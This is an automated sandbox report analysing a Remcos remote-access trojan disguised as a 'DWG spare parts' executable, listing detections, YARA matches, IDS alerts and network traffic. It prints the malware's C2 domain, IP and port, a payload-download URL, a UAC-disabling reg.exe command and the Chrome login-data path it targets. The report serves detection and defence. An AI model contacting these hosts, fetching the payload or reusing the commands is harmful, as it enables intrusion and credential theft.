Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DWG spare parts 455RTMGF Model.exe

Overview

General Information

Sample Name:DWG spare parts 455RTMGF Model.exe
Analysis ID:704249
MD5:e9d007ac53470351186a5b53bc180ed3
SHA1:e1411689c7eb12dc132db9496f25736fba5e9f0d
SHA256:c60e8a14abc81ae3f2ffbe04b32240a92b900107e4acc9eb88e43632aee1266c
Tags:exeRATRemcosRAT
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Yara detected Remcos RAT
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Yara detected UAC Bypass using ComputerDefaults
Delayed program exit found
Injects a PE file into a foreign processes
Contains functionality to inject code into remote processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject threads in other processes
Uses dynamic DNS services
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Detected TCP or UDP traffic on non-standard ports
Yara detected Keylogger Generic
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • Uuddcmhn.exe (PID: 5392 cmdline: "C:\Users\Public\Libraries\Uuddcmhn.exe" MD5: E9D007AC53470351186A5B53BC180ED3)
    • Uuddcmhn.exe (PID: 428 cmdline: C:\Users\Public\Libraries\Uuddcmhn.exe MD5: E9D007AC53470351186A5B53BC180ED3)
  • Uuddcmhn.exe (PID: 2664 cmdline: "C:\Users\Public\Libraries\Uuddcmhn.exe" MD5: E9D007AC53470351186A5B53BC180ED3)
    • Uuddcmhn.exe (PID: 2844 cmdline: C:\Users\Public\Libraries\Uuddcmhn.exe MD5: E9D007AC53470351186A5B53BC180ED3)
  • cleanup

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "bestsuccess.ddns.net:2442:0", "Assigned name": "bestbaby", "Copy file": "remcos.exe", "Startup value": "Remcos", "Mutex": "Rmc-COV1FL", "Keylog file": "logs.dat", "Screenshot file": "Screenshots", "Audio folder": "MicRecords", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "100000"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\Public\Libraries\nhmcdduU.urlMethodology_Shortcut_HotKeyDetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
  • 0x58:$hotkey: \x0AHotKey=5
  • 0x0:$url_explicit: [InternetShortcut]
C:\Users\Public\Libraries\nhmcdduU.urlMethodology_Contains_Shortcut_OtherURIhandlersDetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
  • 0x14:$file: URL=
  • 0x0:$url_explicit: [InternetShortcut]

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.298955656.000000000276D000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_UACBypassusingComputerDefaultsYara detected UAC Bypass using ComputerDefaultsJoe Security
    0000000C.00000002.315016361.000000000289D000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_UACBypassusingComputerDefaultsYara detected UAC Bypass using ComputerDefaultsJoe Security
      00000000.00000003.247877361.000000007FCA0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_UACBypassusingComputerDefaultsYara detected UAC Bypass using ComputerDefaultsJoe Security
        00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_UACBypassusingComputerDefaultsYara detected UAC Bypass using ComputerDefaultsJoe Security
          00000000.00000002.258351591.000000000231E000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_UACBypassusingComputerDefaultsYara detected UAC Bypass using ComputerDefaultsJoe Security
            Click to see the 17 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.DWG spare parts 455RTMGF Model.exe.2510000.1.unpackJoeSecurity_UACBypassusingComputerDefaultsYara detected UAC Bypass using ComputerDefaultsJoe Security
              1.0.DWG spare parts 455RTMGF Model.exe.400000.0.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                1.0.DWG spare parts 455RTMGF Model.exe.400000.0.raw.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewerdetects Windows exceutables potentially bypassing UAC using eventvwr.exeditekSHen
                • 0x63100:$s1: \Classes\mscfile\shell\open\command
                • 0x63160:$s1: \Classes\mscfile\shell\open\command
                • 0x63148:$s2: eventvwr.exe
                1.0.DWG spare parts 455RTMGF Model.exe.400000.0.raw.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                • 0x691e0:$a1: Remcos restarted by watchdog!
                • 0x69738:$a3: %02i:%02i:%02i:%03i
                • 0x69abd:$a4: * Remcos v
                1.0.DWG spare parts 455RTMGF Model.exe.400000.0.raw.unpackREMCOS_RAT_variantsunknownunknown
                • 0x641e4:$str_a1: C:\Windows\System32\cmd.exe
                • 0x64160:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                • 0x64160:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                • 0x63610:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                • 0x63e48:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                • 0x6320c:$str_b2: Executing file:
                • 0x64328:$str_b3: GetDirectListeningPort
                • 0x63c08:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                • 0x63e30:$str_b7: \update.vbs
                • 0x63234:$str_b9: Downloaded file:
                • 0x63220:$str_b10: Downloading file:
                • 0x632c4:$str_b12: Failed to upload file:
                • 0x642f0:$str_b13: StartForward
                • 0x64310:$str_b14: StopForward
                • 0x63dd8:$str_b15: fso.DeleteFile "
                • 0x63d6c:$str_b16: On Error Resume Next
                • 0x63e08:$str_b17: fso.DeleteFolder "
                • 0x632b4:$str_b18: Uploaded file:
                • 0x63274:$str_b19: Unable to delete:
                • 0x63da0:$str_b20: while fso.FileExists("
                • 0x63749:$str_c0: [Firefox StoredLogins not found]
                Click to see the 4 entries

                Sigma Signatures

                No Sigma rule has matched

                Snort Signatures

                Timestamp:192.168.2.7141.8.192.15149731802850263 09/16/22-17:08:58.134170
                SID:2850263
                Source Port:49731
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.8.192.15149721802850263 09/16/22-17:08:30.690772
                SID:2850263
                Source Port:49721
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.8.192.15149727802850263 09/16/22-17:08:49.810384
                SID:2850263
                Source Port:49727
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:79.134.225.115192.168.2.72442497252032777 09/16/22-17:10:37.016548
                SID:2032777
                Source Port:2442
                Destination Port:49725
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.779.134.225.1154972524422032776 09/16/22-17:08:34.884246
                SID:2032776
                Source Port:49725
                Destination Port:2442
                Protocol:TCP
                Classtype:A Network Trojan was detected

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Multi AV Scanner detection for submitted file
                Source: DWG spare parts 455RTMGF Model.exeReversingLabs: Detection: 76%
                Source: DWG spare parts 455RTMGF Model.exeVirustotal: Detection: 54%Perma Link
                Yara detected Remcos RAT
                Source: Yara matchFile source: 1.0.DWG spare parts 455RTMGF Model.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.0.DWG spare parts 455RTMGF Model.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000003.257505100.000000007EF10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.259012646.000000007EF90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000000.257426090.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: DWG spare parts 455RTMGF Model.exe PID: 3432, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: DWG spare parts 455RTMGF Model.exe PID: 5320, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Uuddcmhn.exe PID: 2844, type: MEMORYSTR
                Antivirus detection for URL or domain
                Source: bestsuccess.ddns.netAvira URL Cloud: Label: malware
                Multi AV Scanner detection for domain / URL
                Source: bestsuccess.ddns.netVirustotal: Detection: 12%Perma Link
                Multi AV Scanner detection for dropped file
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeReversingLabs: Detection: 76%
                Source: 0.2.DWG spare parts 455RTMGF Model.exe.2510000.1.unpackAvira: Label: TR/Hijacker.Gen
                Source: 1.0.DWG spare parts 455RTMGF Model.exe.400000.0.unpackAvira: Label: BDS/Backdoor.Gen
                Source: 00000006.00000002.299148196.0000000000547000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "bestsuccess.ddns.net:2442:0", "Assigned name": "bestbaby", "Copy file": "remcos.exe", "Startup value": "Remcos", "Mutex": "Rmc-COV1FL", "Keylog file": "logs.dat", "Screenshot file": "Screenshots", "Audio folder": "MicRecords", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "100000"}
                Source: DWG spare parts 455RTMGF Model.exe, 00000000.00000003.257505100.000000007EF10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----

                Exploits

                barindex
                Yara detected UAC Bypass using ComputerDefaults
                Source: Yara matchFile source: 0.2.DWG spare parts 455RTMGF Model.exe.2510000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.298955656.000000000276D000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.315016361.000000000289D000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.247877361.000000007FCA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.258351591.000000000231E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: DWG spare parts 455RTMGF Model.exe PID: 3432, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Uuddcmhn.exe PID: 5392, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Uuddcmhn.exe PID: 2664, type: MEMORYSTR
                Source: DWG spare parts 455RTMGF Model.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                Source: Binary string: easinvoker.pdb source: DWG spare parts 455RTMGF Model.exe, DWG spare parts 455RTMGF Model.exe, 00000000.00000003.247877361.000000007FCA0000.00000004.00001000.00020000.00000000.sdmp, DWG spare parts 455RTMGF Model.exe, 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmp, DWG spare parts 455RTMGF Model.exe, 00000000.00000002.258351591.000000000231E000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: easinvoker.pdbH source: DWG spare parts 455RTMGF Model.exe, 00000000.00000003.247877361.000000007FCA0000.00000004.00001000.00020000.00000000.sdmp, DWG spare parts 455RTMGF Model.exe, 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmp, DWG spare parts 455RTMGF Model.exe, 00000000.00000002.258351591.000000000231E000.00000004.00001000.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeCode function: 0_2_02515B48 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_02515B48

                Networking

                barindex
                Snort IDS alert for network traffic
                Source: TrafficSnort IDS: 2850263 ETPRO TROJAN MalDoc Downloader User-Agent 192.168.2.7:49721 -> 141.8.192.151:80
                Source: TrafficSnort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.2.7:49725 -> 79.134.225.115:2442
                Source: TrafficSnort IDS: 2032777 ET TROJAN Remcos 3.x Unencrypted Server Response 79.134.225.115:2442 -> 192.168.2.7:49725
                Source: TrafficSnort IDS: 2850263 ETPRO TROJAN MalDoc Downloader User-Agent 192.168.2.7:49727 -> 141.8.192.151:80
                Source: TrafficSnort IDS: 2850263 ETPRO TROJAN MalDoc Downloader User-Agent 192.168.2.7:49731 -> 141.8.192.151:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: bestsuccess.ddns.net
                Uses dynamic DNS services
                Source: unknownDNS query: name: bestsuccess.ddns.net
                Source: Joe Sandbox ViewASN Name: FINK-TELECOM-SERVICESCH FINK-TELECOM-SERVICESCH
                Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                Source: Joe Sandbox ViewIP Address: 79.134.225.115 79.134.225.115
                Source: global trafficTCP traffic: 192.168.2.7:49725 -> 79.134.225.115:2442
                Source: Uuddcmhn.exe, 0000000C.00000002.315054022.00000000029DE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://f0719949.xsph.ru/Uuddcmhnxqhfgvscgvechrthfvxthbvnjytchegfrhvbrtgnthyfgnbvgfcfbhgfyuyuyuyuyuyu
                Source: DWG spare parts 455RTMGF Model.exe, 00000000.00000003.257505100.000000007EF10000.00000004.00001000.00020000.00000000.sdmp, DWG spare parts 455RTMGF Model.exe, 00000000.00000002.259012646.000000007EF90000.00000004.00001000.00020000.00000000.sdmp, DWG spare parts 455RTMGF Model.exe, 00000001.00000000.257426090.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                Source: unknownDNS traffic detected: queries for: f0719949.xsph.ru
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeCode function: 0_2_02525974 InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,0_2_02525974
                Source: global trafficHTTP traffic detected: GET /Uuddcmhnxqhfgvscgvechrthfvxthbvnjytchegfrhvbrtgnthyfgnbvgfcfbhgfyuyuyuyuyuyuytttrrrfgh HTTP/1.1User-Agent: lValiHost: f0719949.xsph.ru
                Source: global trafficHTTP traffic detected: GET /Uuddcmhnxqhfgvscgvechrthfvxthbvnjytchegfrhvbrtgnthyfgnbvgfcfbhgfyuyuyuyuyuyuytttrrrfgh HTTP/1.1User-Agent: 53Host: f0719949.xsph.ru
                Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /Uuddcmhnxqhfgvscgvechrthfvxthbvnjytchegfrhvbrtgnthyfgnbvgfcfbhgfyuyuyuyuyuyuytttrrrfgh HTTP/1.1User-Agent: lValiHost: f0719949.xsph.ru
                Source: global trafficHTTP traffic detected: GET /Uuddcmhnxqhfgvscgvechrthfvxthbvnjytchegfrhvbrtgnthyfgnbvgfcfbhgfyuyuyuyuyuyuytttrrrfgh HTTP/1.1User-Agent: 62Host: f0719949.xsph.ru
                Source: global trafficHTTP traffic detected: GET /Uuddcmhnxqhfgvscgvechrthfvxthbvnjytchegfrhvbrtgnthyfgnbvgfcfbhgfyuyuyuyuyuyuytttrrrfgh HTTP/1.1User-Agent: lValiHost: f0719949.xsph.ru
                Source: global trafficHTTP traffic detected: GET /Uuddcmhnxqhfgvscgvechrthfvxthbvnjytchegfrhvbrtgnthyfgnbvgfcfbhgfyuyuyuyuyuyuytttrrrfgh HTTP/1.1User-Agent: 17Host: f0719949.xsph.ru
                Source: Yara matchFile source: Process Memory Space: DWG spare parts 455RTMGF Model.exe PID: 3432, type: MEMORYSTR

                E-Banking Fraud

                barindex
                Yara detected Remcos RAT
                Source: Yara matchFile source: 1.0.DWG spare parts 455RTMGF Model.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.0.DWG spare parts 455RTMGF Model.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000003.257505100.000000007EF10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.259012646.000000007EF90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000000.257426090.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: DWG spare parts 455RTMGF Model.exe PID: 3432, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: DWG spare parts 455RTMGF Model.exe PID: 5320, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Uuddcmhn.exe PID: 2844, type: MEMORYSTR

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 1.0.DWG spare parts 455RTMGF Model.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                Source: 1.0.DWG spare parts 455RTMGF Model.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 1.0.DWG spare parts 455RTMGF Model.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 1.0.DWG spare parts 455RTMGF Model.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                Source: 1.0.DWG spare parts 455RTMGF Model.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 1.0.DWG spare parts 455RTMGF Model.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 00000000.00000003.257505100.000000007EF10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 00000000.00000002.259012646.000000007EF90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 00000001.00000000.257426090.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                Source: 00000001.00000000.257426090.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 00000001.00000000.257426090.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                Source: Process Memory Space: DWG spare parts 455RTMGF Model.exe PID: 3432, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: DWG spare parts 455RTMGF Model.exe PID: 5320, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: DWG spare parts 455RTMGF Model.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                Source: 1.0.DWG spare parts 455RTMGF Model.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                Source: 1.0.DWG spare parts 455RTMGF Model.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 1.0.DWG spare parts 455RTMGF Model.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 1.0.DWG spare parts 455RTMGF Model.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                Source: 1.0.DWG spare parts 455RTMGF Model.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 1.0.DWG spare parts 455RTMGF Model.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 00000000.00000003.257505100.000000007EF10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 00000000.00000002.259012646.000000007EF90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 00000001.00000000.257426090.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                Source: 00000001.00000000.257426090.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 00000001.00000000.257426090.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: Process Memory Space: DWG spare parts 455RTMGF Model.exe PID: 3432, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: DWG spare parts 455RTMGF Model.exe PID: 5320, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: C:\Users\Public\Libraries\nhmcdduU.url, type: DROPPEDMatched rule: Methodology_Shortcut_HotKey author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, score = 27.09.2019, reference = https://twitter.com/cglyer/status/1176184798248919044
                Source: C:\Users\Public\Libraries\nhmcdduU.url, type: DROPPEDMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, score = 27.09.2019, reference = https://twitter.com/cglyer/status/1176184798248919044
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeCode function: 0_2_025120F40_2_025120F4
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeCode function: 2_2_027520F42_2_027520F4
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeCode function: 12_2_028820F412_2_028820F4
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeCode function: String function: 02884A98 appears 433 times
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeCode function: String function: 02754A98 appears 433 times
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeCode function: String function: 02884C24 appears 141 times
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeCode function: String function: 02754C24 appears 141 times
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeCode function: String function: 02514C24 appears 205 times
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeCode function: String function: 025148A0 appears 61 times
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeCode function: String function: 02514A98 appears 653 times
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeCode function: 0_2_025248A4 CreateProcessA,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,SetThreadContext,ResumeThread,0_2_025248A4
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeCode function: 0_2_02525DE4 Sleep,Sleep,CopyFileA,WinExec,OpenProcess,NtSuspendProcess,ExitProcess,0_2_02525DE4
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeCode function: 0_2_02528285 Sleep,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,WinExec,OpenProcess,NtSuspendProcess,ExitProcess,0_2_02528285
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeCode function: 0_2_0252874D Sleep,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,WinExec,OpenProcess,NtSuspendProcess,ExitProcess,0_2_0252874D
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeCode function: 0_2_02525DE4 Sleep,Sleep,CopyFileA,WinExec,OpenProcess,NtSuspendProcess,ExitProcess,0_2_02525DE4
                Source: C:\Users\user\Desktop\DWG spare parts 455RTMGF Model.exeCode function: 0_2_025248A2 CreateProcessA,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,SetThreadContext,ResumeThread,0_2_025248A2
                Source: C:\Users\Public\Libraries\Uuddcmhn.exeCode function: 2_2_027648A4 CreateProcessA,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,SetThreadContext,ResumeThread,2_2_027648A4
